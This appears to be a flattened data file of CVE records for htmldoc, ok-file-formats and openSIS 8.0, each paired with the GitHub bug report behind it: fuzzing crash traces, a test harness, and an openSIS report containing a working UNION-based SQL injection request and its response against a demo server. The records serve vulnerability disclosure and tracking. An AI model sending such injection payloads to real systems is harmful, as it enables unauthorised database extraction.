{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "secalert@redhat.com", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1967028" }, { "source": "secalert@redhat.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/michaelrsweet/htmldoc/commit/ba61a3ece382389ae4482c7027af8b32e8ab4cc8" }, { "source": "secalert@redhat.com", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/michaelrsweet/htmldoc/issues/416" }, { "source": "secalert@redhat.com", "tags": [ "Third Party Advisory" ], "url": "https://ubuntu.com/security/CVE-2021-23206" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1967028" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/michaelrsweet/htmldoc/commit/ba61a3ece382389ae4482c7027af8b32e8ab4cc8" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/michaelrsweet/htmldoc/issues/416" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://ubuntu.com/security/CVE-2021-23206" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:htmldoc_project:htmldoc:*:*:*:*:*:*:*:*", "matchCriteriaId": "B9DD956F-44F8-4CB5-B9FD-9269C3E931F2", "versionEndExcluding": null, "versionEndIncluding": "1.9.12", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/michaelrsweet/htmldoc/issues/416
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "michaelrsweet", "htmldoc" ]
Hello, While fuzzing htmldoc , I found a stack-buffer-overflow in parse_table() ps-pdf.cxx:6611:25 - test platform htmldoc Version 1.9.12 git [master 6898d0a] OS :Ubuntu 20.04.1 LTS x86_64 kernel: 5.4.0-53-generic compiler: clang version 10.0.0-4ubuntu1 reproduced: ``` htmldoc -f demo.pdf poc6.html ``` poc(zipped for update): [poc6.zip](https://github.com/michaelrsweet/htmldoc/files/5872200/poc6.zip) ``` ================================================================= ==38215==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7fff47945520 at pc 0x000000589ba7 bp 0x7fff47941170 sp 0x7fff47941168 READ of size 4 at 0x7fff47945520 thread T0 #0 0x589ba6 in parse_table(tree_str*, float, float, float, float, float*, float*, int*, int) /home//htmldoc_sani/htmldoc/ps-pdf.cxx:6611:25 #1 0x558013 in parse_doc(tree_str*, float*, float*, float*, float*, float*, float*, int*, tree_str*, int*) /home//htmldoc_sani/htmldoc/ps-pdf.cxx:4167:11 #2 0x556c54 in parse_doc(tree_str*, float*, float*, float*, float*, float*, float*, int*, tree_str*, int*) /home//htmldoc_sani/htmldoc/ps-pdf.cxx:4081:9 #3 0x556c54 in parse_doc(tree_str*, float*, float*, float*, float*, float*, float*, int*, tree_str*, int*) /home//htmldoc_sani/htmldoc/ps-pdf.cxx:4081:9 #4 0x54f90e in pspdf_export /home//htmldoc_sani/htmldoc/ps-pdf.cxx:803:3 #5 0x53c845 in main /home//htmldoc_sani/htmldoc/htmldoc.cxx:1291:3 #6 0x7ffbda5cf0b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16 #7 0x41f8bd in _start (/home//htmldoc_sani/htmldoc/htmldoc+0x41f8bd) Address 0x7fff47945520 is located in stack of thread T0 at offset 17312 in frame #0 0x585052 in parse_table(tree_str*, float, float, float, float, float*, float*, int*, int) /home//htmldoc_sani/htmldoc/ps-pdf.cxx:6308 This frame has 12 object(s): [32, 36) 'left.addr' [48, 52) 'right.addr' [64, 17312) 'table' (line 6317) <== Memory access at offset 17312 overflows this variable [17568, 17572) 'col_min' (line 6318) [17584, 17588) 'col_pref' (line 6318) [17600, 17604) 'col_height' (line 6318) [17616, 17620) 'temp_bottom' (line 6318) [17632, 17636) 'temp_top' (line 6318) [17648, 17652) 'temp_page' (line 6335) [17664, 17676) 'bgrgb' (line 6346) [17696, 17951) 'table_text' (line 6980) [18016, 18020) 'temp_y' (line 7092) HINT: this may be a false positive if your program uses some custom stack unwind mechanism, swapcontext or vfork (longjmp and C++ exceptions *are* supported) SUMMARY: AddressSanitizer: stack-buffer-overflow /home//htmldoc_sani/htmldoc/ps-pdf.cxx:6611:25 in parse_table(tree_str*, float, float, float, float, float*, float*, int*, int) Shadow bytes around the buggy address: 0x100068f20a50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x100068f20a60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x100068f20a70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x100068f20a80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x100068f20a90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x100068f20aa0: 00 00 00 00[f2]f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 0x100068f20ab0: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 0x100068f20ac0: f2 f2 f2 f2 04 f2 04 f2 04 f2 04 f2 04 f2 04 f2 0x100068f20ad0: 00 04 f2 f2 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 0x100068f20ae0: f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 0x100068f20af0: f8 f8 f8 f8 f2 f2 f2 f2 f2 f2 f2 f2 f8 f3 f3 f3 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==38215==ABORTING ``` ``` ─ source:ps-pdf.cxx+6611 ──── 6606 table.col_smins[col] = col_min; 6607 6608 temp_width = col_width / colspan; 6609 for (int i = 0; i < colspan; i ++) 6610 { // i=0x1d0a, col=0x1 → 6611 if (temp_width > table.col_widths[col + i]) 6612 table.col_widths[col + i] = temp_width; 6613 } 6614 } 6615 else 6616 { ─ threads ──── [#0] Id 1, Name: "htmldoc", stopped 0x4238fa in parse_table (), reason: SIGSEGV ─ trace ──── [#0] 0x4238fa → parse_table(t=0x918b60, left=0, right=487, bottom=22, top=698, x=<optimized out>, y=0x7fffffffb674, page=<optimized out>, needspace=0x1) [#1] 0x4157c0 → parse_doc(t=0x918b60, left=0x7fffffffb6e8, right=0x7fffffffb6e4, bottom=0x7fffffffb6ac, top=<optimized out>, x=<optimized out>, y=0x7fffffffb674, page=0x7fffffffb684, cpara=0x917d10, needspace=0x7fffffffb6d4) [#2] 0x414964 → parse_doc(t=0x918390, left=<optimized out>, right=<optimized out>, bottom=<optimized out>, top=0x7fffffffb69c, x=0x7fffffffb6ec, y=<optimized out>, page=<optimized out>, cpara=<optimized out>, needspace=<optimized out>) [#3] 0x414964 → parse_doc(t=0x9171d0, left=<optimized out>, right=<optimized out>, bottom=<optimized out>, top=0x7fffffffb69c, x=0x7fffffffb6ec, y=<optimized out>, page=<optimized out>, cpara=<optimized out>, needspace=<optimized out>) [#4] 0x411980 → pspdf_export(document=<optimized out>, toc=<optimized out>) [#5] 0x408e89 → main(argc=<optimized out>, argv=<optimized out>) ``` reporter: chiba of topsec alphalab
AddressSanitizer: stack-buffer-overflow in parse_table ps-pdf.cxx:6611:25
https://api.github.com/repos/michaelrsweet/htmldoc/issues/416/comments
3
2021-01-26T08:54:36Z
2022-03-11T05:14:48Z
https://github.com/michaelrsweet/htmldoc/issues/416
794,051,710
416
3,274
CVE-2021-44335
2022-03-03T00:15:08.157
David Brackeen ok-file-formats 203defd is vulnerable to Buffer Overflow. When the function of the ok-file-formats project is used, a heap-buffer-overflow occurs in function ok_png_transform_scanline() in "/ok_png.c:533".
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/brackeen/ok-file-formats/issues/17" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/brackeen/ok-file-formats/issues/17" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:ok-file-formats_project:ok-file-formats:2021-06-05:*:*:*:*:*:*:*", "matchCriteriaId": "FEF1A3E0-1854-4086-844E-05721E915556", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/brackeen/ok-file-formats/issues/17
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "brackeen", "ok-file-formats" ]
## Version [203defd](https://github.com/brackeen/ok-file-formats/commit/203defdfb2c8b1207a392493a09145c1b54bb070) # Environment Ubuntu 18.04,64 bit # Testcase ```c #include <stdio.h> #include <stdlib.h> #include "ok_png.c" #include "ok_png.h" int main(int _argc, char **_argv) { FILE *file = fopen(_argv[1], "rb"); ok_png image = ok_png_read(file, OK_PNG_COLOR_FORMAT_RGBA ); fclose(file); if (image.data) { printf("Got image! Size: %li x %li\n", (long)image.width, (long)image.height); free(image.data); } return 0; } ``` # Command Compile test program: ``` $ gcc -g -o main main.c ok_png.h ``` Compile test program with address sanitizer with this command: ``` $ gcc -g -fsanitize=address -o asanpng main.c ok_png.h ``` # Result The result of running without ASAN: ``` $ ./main heap-buffer-overflow-5.png free(): invalid pointer Aborted (core dumped) ``` Information obtained by using ASAN: ``` $ ./asanpng heap-buffer-overflow-5.png ================================================================= ==14406==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x621000002500 at pc 0x0000004e363f bp 0x7ffdc4189f10 sp 0x7ffdc4189f08 WRITE of size 1 at 0x621000002500 thread T0 #0 0x4e363e in ok_png_transform_scanline /docker/ok-file-formats-png/ok_png.c:533:20 #1 0x4e363e in ok_png_read_data /docker/ok-file-formats-png/ok_png.c:895:13 #2 0x4e363e in ok_png_decode2 /docker/ok-file-formats-png/ok_png.c:971:23 #3 0x4e363e in ok_png_decode /docker/ok-file-formats-png/ok_png.c:1025:5 #4 0x4e81d5 in ok_png_read_with_allocator /docker/ok-file-formats-png/ok_png.c:188:9 #5 0x4e81d5 in ok_png_read /docker/ok-file-formats-png/ok_png.c:177:12 #6 0x4e81d5 in main /docker/ok-file-formats-png/main.c:8:20 #7 0x7f574c1aa0b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2) #8 0x41c38d in _start (/docker/ok-file-formats-png/afl_asan+0x41c38d) 0x621000002500 is located 0 bytes to the right of 4096-byte region [0x621000001500,0x621000002500) allocated by thread T0 here: #0 0x4975ed in malloc (/docker/ok-file-formats-png/afl_asan+0x4975ed) #1 0x4cd004 in ok_png_read_data /docker/ok-file-formats-png/ok_png.c:774:29 #2 0x4cd004 in ok_png_decode2 /docker/ok-file-formats-png/ok_png.c:971:23 #3 0x4cd004 in ok_png_decode /docker/ok-file-formats-png/ok_png.c:1025:5 #4 0x4e81d5 in ok_png_read_with_allocator /docker/ok-file-formats-png/ok_png.c:188:9 #5 0x4e81d5 in ok_png_read /docker/ok-file-formats-png/ok_png.c:177:12 #6 0x4e81d5 in main /docker/ok-file-formats-png/main.c:8:20 #7 0x7f574c1aa0b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2) SUMMARY: AddressSanitizer: heap-buffer-overflow /docker/ok-file-formats-png/ok_png.c:533:20 in ok_png_transform_scanline Shadow bytes around the buggy address: 0x0c427fff8450: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c427fff8460: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c427fff8470: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c427fff8480: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c427fff8490: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c427fff84a0:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c427fff84b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c427fff84c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c427fff84d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c427fff84e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c427fff84f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==14406==ABORTING ``` # Description A heap-buffer-overflow was discovered in ok_file_formats. The issue is being triggered in function ok_png_transform_scanline() at ok_png.c:533:20. # Poc Poc file is [this](https://github.com/nisl-bugTest/Pocfiles/blob/main/fuzzing/ok-file-formats/heap-buffer-overflow-5/poc).
heap-buffer-overflow in function ok_png_transform_scanline() at ok_png.c:533:20
https://api.github.com/repos/brackeen/ok-file-formats/issues/17/comments
1
2021-06-07T05:03:03Z
2022-05-09T10:33:04Z
https://github.com/brackeen/ok-file-formats/issues/17
913,092,383
17
3,275
CVE-2021-44343
2022-03-03T00:15:08.200
David Brackeen ok-file-formats 203defd is vulnerable to Buffer Overflow. When the function of the ok-file-formats project is used, a heap-buffer-overflow occurred in function ok_png_read_data() in "/ok_png.c".
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/brackeen/ok-file-formats/issues/18" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/brackeen/ok-file-formats/issues/18" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:ok-file-formats_project:ok-file-formats:2021-06-05:*:*:*:*:*:*:*", "matchCriteriaId": "FEF1A3E0-1854-4086-844E-05721E915556", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "120" ]
120
https://github.com/brackeen/ok-file-formats/issues/18
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "brackeen", "ok-file-formats" ]
# Version [203defd](https://github.com/brackeen/ok-file-formats/commit/203defdfb2c8b1207a392493a09145c1b54bb070) # Environment Ubuntu 18.04,64 bit # Testcase ```c #include <stdio.h> #include <stdlib.h> #include "ok_png.c" #include "ok_png.h" int main(int _argc, char **_argv) { FILE *file = fopen(_argv[1], "rb"); ok_png image = ok_png_read(file, OK_PNG_COLOR_FORMAT_RGBA ); fclose(file); if (image.data) { printf("Got image! Size: %li x %li\n", (long)image.width, (long)image.height); free(image.data); } return 0; } ``` # Command Compile test program: ``` $ gcc -g -o main main.c ok_png.h ``` Compile test program with address sanitizer with this command: ``` $ gcc -g -fsanitize=address -o asanpng main.c ok_png.h ``` # Result The result of running without ASAN: ``` $ ./main heap-buffer-overflow-6.png free(): invalid pointer Aborted (core dumped) ``` Information obtained by using ASAN: ``` $ ./asanpng heap-buffer-overflow-6.png ================================================================= ==80024==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60d00000cff1 at pc 0x7fa588189dc4 bp 0x7ffcdbf9eeb0 sp 0x7ffcdbf9e658 WRITE of size 769 at 0x60d00000cff1 thread T0 #0 0x7fa588189dc3 (/usr/lib/x86_64-linux-gnu/libasan.so.3+0x47dc3) #1 0x562d30f5a72f in ok_png_read_data /home/xrz/afl++/ok-file-formats-png/issues/ok_png.c:853 #2 0x562d30f5b15d in ok_png_decode2 /home/xrz/afl++/ok-file-formats-png/issues/ok_png.c:971 #3 0x562d30f5b608 in ok_png_decode /home/xrz/afl++/ok-file-formats-png/issues/ok_png.c:1025 #4 0x562d30f542f3 in ok_png_read_with_allocator /home/xrz/afl++/ok-file-formats-png/issues/ok_png.c:188 #5 0x562d30f541cf in ok_png_read /home/xrz/afl++/ok-file-formats-png/issues/ok_png.c:177 #6 0x562d30f607d7 in main /home/xrz/afl++/ok-file-formats-png/issues/main.c:8 #7 0x7fa587d72b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #8 0x562d30f53d79 in _start (/home/xrz/afl++/ok-file-formats-png/issues/heap-buffer-overflow-6/asanpng+0x1d79) 0x60d00000cff1 is located 0 bytes to the right of 129-byte region [0x60d00000cf70,0x60d00000cff1) allocated by thread T0 here: #0 0x7fa588208e80 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.3+0xc6e80) #1 0x562d30f53e9b in ok_stdlib_alloc /home/xrz/afl++/ok-file-formats-png/issues/ok_png.c:58 #2 0x562d30f59e7c in ok_png_read_data /home/xrz/afl++/ok-file-formats-png/issues/ok_png.c:788 #3 0x562d30f5b15d in ok_png_decode2 /home/xrz/afl++/ok-file-formats-png/issues/ok_png.c:971 #4 0x562d30f5b608 in ok_png_decode /home/xrz/afl++/ok-file-formats-png/issues/ok_png.c:1025 #5 0x562d30f542f3 in ok_png_read_with_allocator /home/xrz/afl++/ok-file-formats-png/issues/ok_png.c:188 #6 0x562d30f541cf in ok_png_read /home/xrz/afl++/ok-file-formats-png/issues/ok_png.c:177 #7 0x562d30f607d7 in main /home/xrz/afl++/ok-file-formats-png/issues/main.c:8 #8 0x7fa587d72b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) SUMMARY: AddressSanitizer: heap-buffer-overflow (/usr/lib/x86_64-linux-gnu/libasan.so.3+0x47dc3) Shadow bytes around the buggy address: 0x0c1a7fff99a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c1a7fff99b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c1a7fff99c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c1a7fff99d0: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 00 0x0c1a7fff99e0: 00 00 00 00 01 fa fa fa fa fa fa fa fa fa 00 00 =>0x0c1a7fff99f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00[01]fa 0x0c1a7fff9a00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c1a7fff9a10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c1a7fff9a20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c1a7fff9a30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c1a7fff9a40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==80024==ABORTING ``` # Description A heap-buffer-overflow was discovered in ok_file_formats. The issue is being triggered in ‘/usr/lib/x86_64-linux-gnu/libasan.so.3+0x47dc3’. # Poc Poc file is [this](https://github.com/nisl-bugTest/Pocfiles/blob/main/fuzzing/ok-file-formats/heap-buffer-overflow-6/poc).
heap-buffer-overflow in ‘/usr/lib/x86_64-linux-gnu/libasan.so.3+0x47dc3’
https://api.github.com/repos/brackeen/ok-file-formats/issues/18/comments
1
2021-06-07T05:04:12Z
2022-05-09T10:33:29Z
https://github.com/brackeen/ok-file-formats/issues/18
913,093,151
18
3,276
CVE-2021-40635
2022-03-03T14:15:07.870
OS4ED openSIS 8.0 is affected by SQL injection in ChooseCpSearch.php, ChooseRequestSearch.php. An attacker can inject a SQL query to extract information from the database.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/OS4ED/openSIS-Classic/issues/195" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/OS4ED/openSIS-Classic/issues/195" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:os4ed:opensis:8.0:*:*:*:*:*:*:*", "matchCriteriaId": "20B5286C-4CFF-4710-8D23-C76669FADFE7", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/OS4ED/openSIS-Classic/issues/195
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "OS4ED", "openSIS-Classic" ]
Due to no security mechanism was implemented in parameter `id`, attacker can inject arbitrary SQL query and extract database informations ![Screenshot from 2021-09-01 22-34-35](https://user-images.githubusercontent.com/35491855/131700825-f4e7a36a-22d2-43fb-b442-948cd4c9a4b8.png) ### Vulnerable code section **ChooseCpSearch.php** ![Screenshot from 2021-09-01 22-37-03](https://user-images.githubusercontent.com/35491855/131702274-8fc8f7a3-0d0a-46f0-b5b8-0e222fa8f64b.jpg) **ChooseRequestSearch.php** ![Screenshot from 2021-09-01 22-40-53](https://user-images.githubusercontent.com/35491855/131702347-eabb8531-9631-4bd9-a12c-8096e9ec85b5.jpg) ### Request and Response <pre>GET /ChooseRequestSearch.php?id=1'+union+select+1,group_concat(table_name),3+FROM+information_schema.tables+WHERE+table_schema=database()--+-&table_name=courses HTTP/1.1 Host: demo.opensis.com User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Connection: close Referer: http://demo.opensis.com/Modules.php?modname=miscellaneous/Portal.php&failed_login= Cookie: PHPSESSID=hlbs4pioon9tgupfig1n2hsgu1</pre> <pre>HTTP/1.1 200 OK Date: Wed, 01 Sep 2021 15:34:05 GMT Server: Apache/2.4.7 (Ubuntu) X-Powered-By: PHP/5.5.9-1ubuntu4.29 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Length: 1194 Connection: close Content-Type: text/html course_modal_request||<h6>3 courses were found.</h6><table class="table table-bordered"><thead><tr class="alpha-grey"><th>Course</th></tr></thead><tbody><tr><td><a href=javascript:void(0); onclick="requestPasteField('Reading','1');">Reading</a></td></tr><tr><td><a href=javascript:void(0); onclick="requestPasteField('Writing','9');">Writing</a></td></tr><tr><td><a href=javascript:void(0); onclick="requestPasteField('api_info,app,attendance_calendar,attendance_code_categories,attendance_codes,attendance_completed,attendance_day,attendance_period,calendar_events,calendar_events_visibility,course_details,course_period_var,course_periods,course_subjects,courses,custom_fields,device_info,eligibility,eligibility_activities,eligibility_completed,enroll_grade','1');">api_info,app,attendance_calendar,attendance_code_categories,attendance_codes,attendance_completed,attendance_day,attendance_period,calendar_events,calendar_events_visibility,course_details,course_period_var,course_periods,course_subjects,courses,custom_fields,device_info,eligibility,eligibility_activities,eligibility_completed,enroll_grade</a></td></tr></tbody></table><div id="request_div" style="display:none;"></div></pre>
SQL Injection in id Parameter
https://api.github.com/repos/OS4ED/openSIS-Classic/issues/195/comments
2
2021-09-01T15:52:40Z
2021-09-09T22:20:42Z
https://github.com/OS4ED/openSIS-Classic/issues/195
985,319,720
195
3,277
CVE-2021-40636
2022-03-03T14:15:07.930
OS4ED openSIS 8.0 is affected by SQL Injection in CheckDuplicateName.php, which can extract information from the database.
